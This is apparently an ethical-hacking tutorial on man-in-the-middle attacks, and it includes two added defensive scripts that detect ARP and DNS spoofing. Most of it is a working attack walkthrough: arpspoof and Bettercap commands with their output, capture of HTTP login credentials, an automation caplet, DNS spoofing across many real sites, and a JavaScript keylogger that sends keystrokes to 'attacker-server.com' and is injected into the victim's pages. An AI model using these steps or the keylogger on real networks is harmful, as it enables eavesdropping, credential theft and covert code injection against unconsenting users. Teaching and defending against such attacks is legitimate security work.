Man-in-the-Middle Attacks: Intercepting Network Communications

Published on September 8, 2025 • 25 min read

In our previous articles, we explored network discovery and wireless security. Today, we'll dive into one of the most powerful attack vectors in ethical hacking: Man-in-the-Middle (MITM) attacks. These attacks allow us to intercept and potentially manipulate communications between two devices.

MITM attacks are particularly dangerous because they can compromise the confidentiality and integrity of network communications, allowing attackers to eavesdrop on sensitive data, inject malicious content, or impersonate legitimate services.

Understanding Man-in-the-Middle Attacks

A Man-in-the-Middle attack occurs when an attacker secretly intercepts and relays communications between two parties who believe they are directly communicating with each other. The attacker can:

[Diagram: Client (IP 192.168.1.104) <-> Attacker (IP 192.168.1.105) <-> Router (IP 192.168.1.1); MAC addresses shown as XX:XX:XX:XX:XX:XX]

ARP Spoofing: The Foundation of MITM Attacks

ARP (Address Resolution Protocol), the protocol that maps IP addresses to MAC addresses on a local network, is the mechanism that lets devices on a LAN find each other's MAC addresses. It has a fundamental security weakness: it is stateless and does not verify the authenticity of ARP responses, so a host accepts whatever mapping it is told.

How ARP Works

When a device wants to communicate with another device on the same network:

  1. It broadcasts an ARP request: "Who has IP address X.X.X.X?"
  2. The device with that IP responds: "I have that IP! My MAC address is XX:XX:XX:XX:XX:XX"
  3. The requesting device stores this mapping in its ARP cache
  4. All future communications to that IP are sent to the MAC address in the ARP cache

Viewing ARP Cache

We can examine the current ARP cache to see IP-to-MAC mappings:

    root@kali:~# arp -a
    _gateway (192.168.1.1) at 84:d8:1b:bf:71:2e [ether] on wlan0

This shows the router's IP (192.168.1.1) and its corresponding MAC address.

Exploiting ARP: The Spoofing Attack

ARP spoofing works by sending forged ARP responses to both the target device and the router: the target is told that the router's IP address belongs to the attacker's MAC address, and the router is told that the target's IP address belongs to the attacker's MAC address.

This creates a situation where all communications between the target and the router flow through our machine.

Important: ARP spoofing only works on local networks. The attacker must be connected to the same network segment as the target.

Step-by-Step ARP Spoofing Attack

Warning: Perform these steps only on networks you own or have explicit permission to test. Unauthorized network interception is illegal.

Step 1: Manual ARP Spoofing with arpspoof

We'll use the arpspoof tool to perform the attack:

    # Tell the target we are the router
    root@kali:~# arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1

    # Tell the router we are the target
    root@kali:~# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.104

After running these commands, the target's ARP cache changes:

    # Before attack
    C:\Users\IEUser>arp -a

    Interface: 192.168.222.141 --- 0x5
      Internet Address      Physical Address      Type
      192.168.222.2         00-50-56-f9-f6-db     dynamic

    # After attack
    C:\Users\IEUser>arp -a

    Interface: 192.168.222.141 --- 0x5
      Internet Address      Physical Address      Type
      192.168.222.2         00-0c-29-1d-1f-1c     dynamic

The target now believes the router's MAC address has changed to the attacker's MAC address.
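The cache change above is exactly what a host-side ARP monitor should catch. The following script is an added example, not part of the original article and not code from arpspoof or Bettercap: it parses the two `arp -a` formats shown on this page (Linux and Windows), compares the gateway's cached MAC against a pinned known-good value, and flags one MAC claimed by several IPs, the trace an attacker leaves when answering for both the router and the target. It also emits the commands for the static ARP entry defence listed at the end of the article. The sample tables are constructed from the article's before/after output; the attacker's own entry (192.168.222.140) and the Windows interface name "Ethernet" are assumptions.

```python
"""ARP-cache monitor: detect gateway MAC changes and duplicate-MAC entries (added example)."""
import re
from collections import defaultdict

# Linux `arp -a`:   _gateway (192.168.1.1) at 84:d8:1b:bf:71:2e [ether] on wlan0
LINUX_RE = re.compile(r"\((\d{1,3}(?:\.\d{1,3}){3})\) at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)
# Windows `arp -a`: "  192.168.222.2         00-50-56-f9-f6-db     dynamic"
WINDOWS_RE = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+\w+", re.I)


def normalize_mac(mac):
    """Lower-case colon form so Linux and Windows entries compare equal."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text):
    """Return {ip: mac} from Linux or Windows `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = LINUX_RE.search(line) or WINDOWS_RE.match(line)
        if m:
            table[m.group(1)] = normalize_mac(m.group(2))
    return table


def detect_arp_spoofing(table, pinned):
    """Return findings; `pinned` maps critical IPs (the gateway) to their known-good MAC."""
    findings = []
    for ip, good_mac in pinned.items():
        cached = table.get(ip)
        if cached is not None and cached != normalize_mac(good_mac):
            findings.append(f"MAC changed for {ip}: expected {normalize_mac(good_mac)}, cache has {cached}")
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:  # one NIC answering for two hosts: the MITM signature
            findings.append(f"MAC {mac} claimed by multiple IPs: {', '.join(sorted(ips))}")
    return findings


def static_arp_commands(ip, mac, windows_interface="Ethernet"):
    """Commands that pin the mapping (the 'static ARP entries' defence). Interface name is an assumption."""
    mac_dash = normalize_mac(mac).replace(":", "-")
    return {
        "linux": f"arp -s {ip} {normalize_mac(mac)}",
        "windows": f'netsh interface ipv4 add neighbors "{windows_interface}" {ip} {mac_dash}',
    }


# Constructed samples, built from the article's before/after Windows output.
PINNED = {"192.168.222.2": "00-50-56-f9-f6-db"}  # gateway MAC recorded on a clean network
BEFORE = """\
Interface: 192.168.222.141 --- 0x5
  Internet Address      Physical Address      Type
  192.168.222.2         00-50-56-f9-f6-db     dynamic
"""
AFTER = """\
Interface: 192.168.222.141 --- 0x5
  Internet Address      Physical Address      Type
  192.168.222.2         00-0c-29-1d-1f-1c     dynamic
  192.168.222.140       00-0c-29-1d-1f-1c     dynamic
"""

if __name__ == "__main__":
    for label, text in (("before", BEFORE), ("after", AFTER)):
        print(label, detect_arp_spoofing(parse_arp_table(text), PINNED) or ["no anomalies"])
    print(static_arp_commands("192.168.222.2", PINNED["192.168.222.2"]))
```

Run it periodically against live `arp -a` output and alert on any finding. The pinned value must come from a known-clean baseline; a static entry stops the cache from being overwritten, but it must be updated by hand if the gateway hardware is replaced.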

Step 2: Enable IP Forwarding

By default, our Kali machine won't forward packets. We need to enable IP forwarding so traffic can flow between the target and router:

    root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Now the target can access the internet normally, but all their traffic flows through our machine!

Using Bettercap for Advanced MITM Attacks

Bettercap is a powerful, modular framework for MITM attacks that provides many advanced features beyond basic ARP spoofing.

Initial Setup and Network Discovery

    root@kali:~# bettercap -iface eth0
    192.168.222.0/24 > 192.168.222.140 » net.probe on
    192.168.222.0/24 > 192.168.222.140 » [03:34:56] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
    192.168.222.0/24 > 192.168.222.140 » [03:34:56] [sys.log] [inf] net.probe probing 256 addresses on 192.168.222.0/24
    192.168.222.0/24 > 192.168.222.140 » [03:34:56] [endpoint.new] endpoint 192.168.222.254 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).
    192.168.222.0/24 > 192.168.222.140 » [03:34:56] [endpoint.new] endpoint 192.168.222.141 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).
    192.168.222.0/24 > 192.168.222.140 » [03:34:57] [endpoint.new] endpoint 192.168.222.1 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).

We can view all discovered devices:

    192.168.222.0/24 > 192.168.222.140 » net.show

    ┌─────────────────┬───────────────────┬─────────┬──────────────┬────────┬────────┬──────────┐
    │ IP ▴            │ MAC               │ Name    │ Vendor       │ Sent   │ Recvd  │ Seen     │
    ├─────────────────┼───────────────────┼─────────┼──────────────┼────────┼────────┼──────────┤
    │ 192.168.222.140 │ XX:XX:XX:XX:XX:XX │ eth0    │ VMware, Inc. │ 0 B    │ 0 B    │ 03:32:06 │
    │ 192.168.222.2   │ XX:XX:XX:XX:XX:XX │ gateway │ VMware, Inc. │ 7.9 kB │ 7.0 kB │ 03:32:07 │
    │ 192.168.222.1   │ XX:XX:XX:XX:XX:XX │         │ VMware, Inc. │ 4.9 kB │ 1.6 kB │ 03:36:26 │
    │ 192.168.222.141 │ XX:XX:XX:XX:XX:XX │         │ VMware, Inc. │ 24 kB  │ 16 kB  │ 03:35:37 │
    │ 192.168.222.254 │ XX:XX:XX:XX:XX:XX │         │ VMware, Inc. │ 0 B    │ 1.5 kB │ 03:34:56 │
    └─────────────────┴───────────────────┴─────────┴──────────────┴────────┴────────┴──────────┘

Configuring and Starting ARP Spoofing

Bettercap provides comprehensive ARP spoofing capabilities:

    192.168.222.0/24 > 192.168.222.140 » help arp.spoof

    arp.spoof (not running): Keep spoofing selected hosts on the network.

       arp.spoof on : Start ARP spoofer.
         arp.ban on : Start ARP spoofer in ban mode, meaning the target(s) connectivity will not work.
      arp.spoof off : Stop ARP spoofer.
        arp.ban off : Stop ARP spoofer.

      Parameters

        arp.spoof.fullduplex   : If true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail). (default=false)
        arp.spoof.internal     : If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the external network. (default=false)
        arp.spoof.skip_restore : If set to true, targets arp cache won't be restored when spoofing is stopped. (default=false)
        arp.spoof.targets      : Comma separated list of IP addresses, MAC addresses or aliases to spoof, also supports nmap style IP ranges. (default=)
        arp.spoof.whitelist    : Comma separated list of IP addresses, MAC addresses or aliases to skip while spoofing. (default=)

Capturing and Analyzing Network Traffic

Network Sniffing with Bettercap

Once we've established the MITM position, we can start capturing network traffic:

    192.168.222.0/24 > 192.168.222.140 » net.sniff on

Bettercap will now display all intercepted HTTP traffic:

    192.168.222.0/24 > 192.168.222.140 » [04:29:46] [net.sniff.http.request] http MSEDGEWIN10.local POST testphp.vulnweb.com/userinfo.php

    POST /userinfo.php HTTP/1.1
    Host: testphp.vulnweb.com
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
    Referer: http://testphp.vulnweb.com/login.php
    Connection: keep-alive
    Content-Length: 34
    Origin: http://testphp.vulnweb.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    uname=masaaki&pass=passworddemotry

    192.168.222.0/24 > 192.168.222.140 » [04:29:46] [net.sniff.http.response] http 44.228.249.3:80 302

In this example, we successfully captured login credentials sent over HTTP.

Limitation: This technique only works with unencrypted HTTP traffic. HTTPS traffic is encrypted and cannot be read without additional techniques like SSL stripping.

Using Caplets for Automated Attacks

Bettercap allows us to create "caplets" - script files that automate complex attack sequences. Create a file called spoof.cap:

    # spoof.cap - Automated MITM attack script
    net.probe on
    set arp.spoof.fullduplex true
    set arp.spoof.targets 192.168.222.141
    arp.spoof on
    net.sniff on

Run the caplet:

    root@kali:~/Downloads# bettercap -iface eth0 -caplet spoof.cap
    bettercap v2.32.0 (built for linux amd64 with go1.22.1) [type 'help' for a list of commands]

    [07:01:56] [sys.log] [inf] gateway monitor started ...
    [07:01:56] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
    [07:01:56] [sys.log] [inf] net.probe probing 256 addresses on 192.168.222.0/24
    [07:01:56] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
    [07:01:56] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
    [07:01:56] [endpoint.new] endpoint 192.168.222.141 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).
    [07:01:56] [endpoint.new] endpoint 192.168.222.1 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).
    [07:01:56] [endpoint.new] endpoint 192.168.222.254 detected as XX:XX:XX:XX:XX:XX (VMware, Inc.).
    192.168.222.0/24 > 192.168.222.140 »

The attack is now running automatically with all configured parameters.

DNS Spoofing: Redirecting Traffic

DNS spoofing allows us to redirect domain name resolutions to IP addresses we control, enabling phishing attacks and content injection.

Setting Up DNS Spoofing

First, ensure our web server is running:

    root@kali:~/Downloads# service apache2 start

Configure DNS spoofing in Bettercap:

    192.168.222.0/24 > 192.168.222.140 » set dns.spoof.all true
    set dns.spoof.domains example-website.tech
    192.168.222.0/24 > 192.168.222.140 » dns.spoof on
    [08:12:04] [net.sniff.mdns] mdns fe80::9eaf:a634:bc9f:e2d1 : A query for wpad.local
    [08:12:04] [net.sniff.mdns] mdns 192.168.222.1 : A query for wpad.local
    [08:12:04] [sys.log] [inf] dns.spoof example-website.tech -> 192.168.222.140

Now when the target visits example-website.tech, they'll be redirected to our machine (192.168.222.140) instead of the real website.
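The log line `dns.spoof example-website.tech -> 192.168.222.140` shows the tell-tale of this attack from the defender's side: a public domain name resolving to an address inside the victim's own LAN. The script below is an added example, not part of the original article and not Bettercap code. It takes (domain, answer) pairs as a passive DNS sensor or resolver log would record them and applies three checks: a public name resolving into private, loopback or link-local space; many unrelated names sharing one answer, which is what `dns.spoof.all true` produces; and, when a reference mapping from an out-of-band resolver is supplied, disagreement with it. The threshold, the `.local`-style exclusion list and all sample data are constructed; the `testphp.vulnweb.com` address is the one that appears in the article's sniffed HTTP response, the `example.org` addresses are invented.

```python
"""Audit observed DNS answers for signs of on-path DNS spoofing (added example)."""
import ipaddress
from collections import defaultdict

SHARED_ANSWER_THRESHOLD = 3  # assumption: tune to the size of the network
LOCAL_SUFFIXES = (".local", ".lan", ".internal", ".home.arpa")  # assumption: names expected in LAN space


def is_public_name(domain):
    """Names that legitimately live in LAN address space are excluded from the private-answer check."""
    name = domain.lower().rstrip(".")
    return "." in name and not name.endswith(LOCAL_SUFFIXES)


def is_internal_address(ip_str):
    """True for RFC 1918, loopback and link-local answers (the article's 192.168.222.140 case)."""
    ip = ipaddress.ip_address(ip_str)
    return ip.is_private or ip.is_loopback or ip.is_link_local


def audit_dns_answers(answers, reference=None):
    """Return (check, domain(s), answer) tuples for every suspicious observation.

    answers:   iterable of (domain, answer_ip) as seen on the wire
    reference: optional {domain: {acceptable answers}} from a trusted out-of-band resolver
    """
    findings = []
    names_by_answer = defaultdict(set)
    for domain, answer in answers:
        names_by_answer[answer].add(domain.lower())
        if is_public_name(domain) and is_internal_address(answer):
            findings.append(("private-answer", domain, answer))
        if reference and domain in reference and answer not in reference[domain]:
            findings.append(("reference-mismatch", domain, answer))
    for answer, names in names_by_answer.items():
        if len(names) >= SHARED_ANSWER_THRESHOLD:  # one address answering for everything
            findings.append(("shared-answer", ",".join(sorted(names)), answer))
    return findings


# Constructed sample: what a sensor on the victim's segment might record while the
# article's dns.spoof configuration is active.
OBSERVED = [
    ("example-website.tech", "192.168.222.140"),
    ("twitter.com", "192.168.222.140"),
    ("github.com", "192.168.222.140"),
    ("printer.local", "192.168.222.50"),      # legitimate LAN name, must not be flagged
    ("testphp.vulnweb.com", "44.228.249.3"),  # address from the article's sniffed response
    ("example.org", "44.228.249.99"),         # invented: disagrees with the reference below
]
REFERENCE = {"testphp.vulnweb.com": {"44.228.249.3"}, "example.org": {"44.228.249.20"}}

if __name__ == "__main__":
    for finding in audit_dns_answers(OBSERVED, REFERENCE):
        print(*finding)
```

The reference-mismatch check will raise false positives for domains served by CDNs or geo-DNS, so in practice restrict it to domains you control or compare against a set of answers gathered over several queries. The private-answer and shared-answer checks need no reference data and are the ones worth wiring into an alert.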

Advanced DNS Spoofing with Multiple Domains

We can target multiple domains by modifying the hstshijack caplet:

    set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
    set dns.spoof.domains twitter.com,*.twitter.com,facebook.com,*.facebook.com,apple.com,*.apple.com,ebay.com,*.ebay.com,*.linkedin.com,linkedin.com,*.example-website.com,example-website.com,*.google.ie,google.ie,*.stackoverflow.com,stackoverflow.com,*.avg.com,avg.com,*.instagram.com,instagram.com,*.tiktok.com,tiktok.com,*.bbc.com,bbc.com,*.cnn.com,cnn.com,*.microsoft.com,microsoft.com,*.reddit.com,reddit.com,*.amazon.com,amazon.com,*.github.com,github.com,*.gitlab.com,gitlab.com
    http.proxy on
    dns.spoof on

Phishing Warning: This technique is commonly used to create fake login pages that capture user credentials. Always use this only for authorized security testing.

Code Injection: Manipulating Web Content

Once we're intercepting traffic, we can inject malicious JavaScript code into web pages the target visits.

Creating JavaScript Payloads

Create a JavaScript file (e.g., keylogger.js) with your malicious code:

    // keylogger.js - Capture keystrokes
    document.addEventListener('keydown', function(e) {
      // Send captured keystrokes to attacker's server
      var xhr = new XMLHttpRequest();
      xhr.open('POST', 'http://attacker-server.com/log', true);
      xhr.send(JSON.stringify({
        key: e.key,
        page: window.location.href,
        timestamp: Date.now()
      }));
    });

Configuring Code Injection

Modify the hstshijack caplet to include our payload:

    set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*:/root/custom-payload.js

Run the enhanced attack:

    192.168.222.0/24 > 192.168.222.140 » hstshijack/hstshijack
    2025-11-24 08:39:11 inf hstshijack Generating random variable names for this session ...
    2025-11-24 08:39:11 inf hstshijack Reading SSL log ...
    2025-11-24 08:39:11 inf hstshijack Reading caplet ...
    2025-11-24 08:39:11 inf hstshijack Module loaded.

    Commands

      hstshijack.show : Show module info.

      hstshijack.payloads
        > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js
        > *:/root/custom-payload.js

Now our JavaScript code will be injected into every page the target visits.

Packet Analysis with Wireshark

Wireshark is a powerful network protocol analyzer that allows detailed inspection of captured packets.

Using Wireshark for Traffic Analysis

  1. Open Wireshark and select your network interface
  2. Start capturing packets
  3. Use filters to focus on specific traffic (e.g., http, tcp.port == 80)
  4. Analyze individual packets to extract sensitive information

[Image: Wireshark interface showing captured HTTP packets with login credentials]

Protection Against MITM Attacks

Understanding these attacks helps us implement effective defenses:

    Defense Strategy      Implementation                                        Effectiveness
    HTTPS Everywhere      Use HTTPS for all web communications                  High
    Static ARP Entries    Configure static ARP entries for critical devices     High
    Network Segmentation  Isolate sensitive systems on separate VLANs           High
    ARP Monitoring        Deploy tools that detect ARP spoofing                 Medium
    Certificate Pinning   Applications should pin expected certificates         High
    VPN Usage             Use VPNs for all sensitive communications             High

Legal and Ethical Considerations

Critical Warning: MITM attacks intercept private communications and are illegal without explicit authorization. These techniques should only be used:

  • On networks you own
  • With explicit written permission from network owners
  • During authorized security assessments
  • In educational environments with proper supervision

Conclusion

Man-in-the-Middle attacks represent one of the most significant threats to network security. By understanding how ARP spoofing, DNS spoofing, and code injection work, security professionals can better defend against these attacks.

The techniques demonstrated in this article—from basic ARP spoofing to advanced Bettercap caplets—show the sophistication of modern MITM attacks. However, they also highlight the importance of proper network security measures like encryption, monitoring, and segmentation.

Key Takeaways:

  • MITM attacks intercept communications between two parties
  • ARP spoofing manipulates IP-to-MAC address mappings
  • DNS spoofing redirects domain name resolutions
  • Code injection allows manipulation of web content
  • HTTPS provides crucial protection against eavesdropping
  • Always obtain proper authorization before testing these techniques

By mastering both the offensive techniques and defensive strategies, security professionals can build more resilient networks and better protect against real-world attacks.